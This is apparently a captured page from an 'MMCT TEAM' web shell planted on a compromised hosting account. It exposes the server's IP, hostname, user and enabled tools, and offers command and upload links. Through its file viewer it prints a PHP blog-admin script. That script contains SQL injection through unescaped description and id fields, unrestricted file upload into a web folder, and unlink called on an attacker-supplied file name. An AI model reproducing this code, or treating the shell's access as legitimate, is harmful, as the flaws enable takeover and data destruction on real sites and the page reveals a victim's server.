MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/nxtproperties/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/nxtproperties/admin/add_blog.php
<?php

include("includes/config.php");

if(isset($_POST['add_blog'])){
    $title = $_POST['title'];
    $postby = $_POST['postby'];
    $edate = $_POST['edate'];
    $emonth = $_POST['emonth'];
    $eyear = $_POST['eyear'];
    $category = $_POST['category'];
    // $etime = $_POST['etime'];

    $description = $_POST['description'];
  

    $photo = $_FILES['photo']['name'];

    // Sanitize input data (for example, you can use mysqli_real_escape_string)
    $title = mysqli_real_escape_string($conn, $title);
    $postby = mysqli_real_escape_string($conn, $postby);
    $edate = mysqli_real_escape_string($conn, $edate);
    $emonth = mysqli_real_escape_string($conn, $emonth);
    $eyear = mysqli_real_escape_string($conn, $eyear);
    $category = mysqli_real_escape_string($conn, $category);
    $etime = mysqli_real_escape_string($conn, $etime);
    // $description = mysqli_real_escape_string($conn, $description);

    $photo = mysqli_real_escape_string($conn, $photo);

    // Construct the SQL query with sanitized input data
    $query = "INSERT INTO `blogs` (`title`, `postby`, `edate`, `emonth`, `eyear`, `category`, `description`, `photo`) VALUES ('$title', '$postby', '$edate', '$emonth', '$eyear',  '$category', '$description', '$photo')";
    $query_run = mysqli_query($conn, $query);

    if($query_run){
        move_uploaded_file($_FILES["photo"]["tmp_name"], "blogs/".$_FILES["photo"]["name"]);
    
        $_SESSION['status'] = "Data Uploaded Successfully";
        header('Location: view-blog.php');
        exit;
    } else {
        $_SESSION['status'] = "Data Not Uploaded Successfully";
        header('Location: blog.php');
        exit;
    }
}



// update 
if(isset($_POST['update_blog'])){
    $id = $_POST['id'];
    $title = $_POST['title'];
    $postby = $_POST['postby'];
    $edate = $_POST['edate'];
    $emonth = $_POST['emonth'];
    $eyear = $_POST['eyear'];
    $category = $_POST['category'];
    // $etime = $_POST['etime'];
    $description = $_POST['description'];
   
    $old_photo = $_POST['image_old'];

    $title = mysqli_real_escape_string($conn, $title);
    $postby = mysqli_real_escape_string($conn, $postby);
    $edate = mysqli_real_escape_string($conn, $edate);
    $emonth = mysqli_real_escape_string($conn, $emonth);
    $eyear = mysqli_real_escape_string($conn, $eyear);
    $category = mysqli_real_escape_string($conn, $category);
    // $etime = mysqli_real_escape_string($conn, $etime);
    $description = mysqli_real_escape_string($conn, $description);

    $old_photo = mysqli_real_escape_string($conn, $old_photo);

    $update_photo_filename = $_FILES["photo"]["name"] ? $_FILES["photo"]["name"] : $old_photo;

    $allowed_image_extensions = array('gif','png','jpg','jpeg','webp','WEBP');

    $photo_file_extension = pathinfo($update_photo_filename, PATHINFO_EXTENSION);

    if(!in_array($photo_file_extension, $allowed_image_extensions)){
        $_SESSION['status'] = "The image file is not allowed. Please upload an image.";
        header("Location: edit-blog.php?id=$id");
        exit;
    }

    // Update the department information in the database
    $query = "UPDATE blogs SET title='$title', postby='$postby', edate='$edate', emonth='$emonth', eyear='$eyear',  category='$category', description='$description', photo='$update_photo_filename' WHERE id ='$id' ";

    $query_run = mysqli_query($conn, $query);

    if($query_run){
       
        if($_FILES["photo"]["name"] !='' && $_FILES["photo"]["name"] != $old_photo){
            move_uploaded_file($_FILES["photo"]["tmp_name"], "blogs/".$_FILES["photo"]["name"]);
            unlink("blogs/". $old_photo);    
        }

        $_SESSION['status'] = "Image and PDF Updated Successfully";
        header('Location: view-blog.php');
    } else {
        $_SESSION['status'] = "Image and PDF Not Updated Successfully";
        header('Location: view-blog.php');
    }
}

// delete

if(isset($_POST['delete_blog'])){
    $id = $_POST['delete_id'];
    $photo = $_POST['del_blog'];
    // $pdf = $_POST['del_pdf'];

    $query = "DELETE FROM blogs WHERE id = '$id'";
    $query_run = mysqli_query($conn, $query);

    if($query_run){
        if(unlink("blogs/".$photo)) {
            $_SESSION['status'] = "Deleted Successfully";
            header('Location: view-blog.php');
        } else {
            $_SESSION['status'] = "Error deleting files";
            header('Location: view-blog.php');
        }
    } else {
        $_SESSION['status'] = "Not Deleted Successfully";
        header('Location: view-blog.php');
    }
}
?>

MMCT - 2023